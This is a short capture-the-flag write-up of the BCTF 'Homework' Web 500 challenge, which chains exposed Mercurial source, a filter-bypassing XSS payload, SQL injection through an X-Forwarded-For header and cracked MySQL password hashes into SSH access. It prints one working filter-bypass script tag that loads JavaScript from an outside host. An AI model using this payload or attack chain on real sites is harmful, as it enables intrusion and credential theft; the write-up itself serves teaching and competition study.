Skip to content

BCTF – Web 500 – Homework

Homework – WEB 500

That’s a very quick and dirty write-up. However, I have seen that no one shared their solutions for that challenge, so I decided to share mine.

Dirbusting

We started with dirbusting the web service and thanks to @d90andrew, we managed to find the source code of the code because it was using Mercurial source control management. You can basically dump the source code using Mercurial Extractor on the following link https://cirt.net/hg-decode.

Source code Analysis 

We analysed the source code and vulnerabilities were found in the following file

We can see that the read.php in the admin folder is vulnerable to SQLi and XSS. I thought we should get the admin’s cookie and then go to the read.php page exploit the SQLi and get the flag from the database.

To exploit the XSS, there was a waf while inserting the data into the database to protect from the XSS.

From the source code, we need to bypass the firewall stripStr()  to have XSS vulnerability. The function looks good but it is bypassable.
One way to bypass this function is to submit request where the content parameter contains the following:

<scridatapt src=//ibrahim-elsayed.com/test.js></scridatapt>

Basically, “data” will be removed and we will end up with

<script src=//ibrahim-elsayed.com/test.js></script>

We tried to get the admin’s cookie but unfortunately it was http-only cookies and there was no any page that leaks the http-only cookie.

but we need to exploit the SQLi? how?

Exploitation

We decided to do that through the XSS vulnerability. Basically, the bot will load our malicious JS code which will

1- Submit a note
2- Visit /admin/read.php with injecting SQL in X-Forwarded-For header. (need to do that before the note is automatically read)
3- Read the output of the SQL injection and send it to my server

After knowing the strategy, Vos and me wrote the following javascript code to exploit the SQLi through the XSS.

Finding the flag

We expected to find the flag in the database either in another table or in the same table in file that was uploaded by the admin.

We checked the database but we couldn’t find the flag anywhere. We tried to read files from mysql we tried load_file(‘/etc/passwd’) but we didn’t have enough permissions.

After a while, I port scanned the server and I found that ssh port is open. Once I saw it I knew where I can find the flag. I dumped users and passwords from mysql.user and then tried to crack the hashes.

We now the password for bctf from the source code of the web application. I tried to login with it ssh and it didn’t work. That was expected because otherwise there is no point of the SQLi. It was enough to dump the source code and read the password. I tried to crack root and firesun. I expected that root won’t be crackable basically because it is root ^^. firesun was the one I am targeting.

After cracking the password I connected to ssh with firesun user and ….

Screen Shot 2016-03-20 at 7.05.46 PM

 

PS: all the SQLi exploitation was done through the bot using the XSS basically. The moral of the story here is that XSS can do more than stealing cookies!

Published inwriteups

Be First to Comment

Leave a Reply

Your email address will not be published. Required fields are marked *

1 × 4 =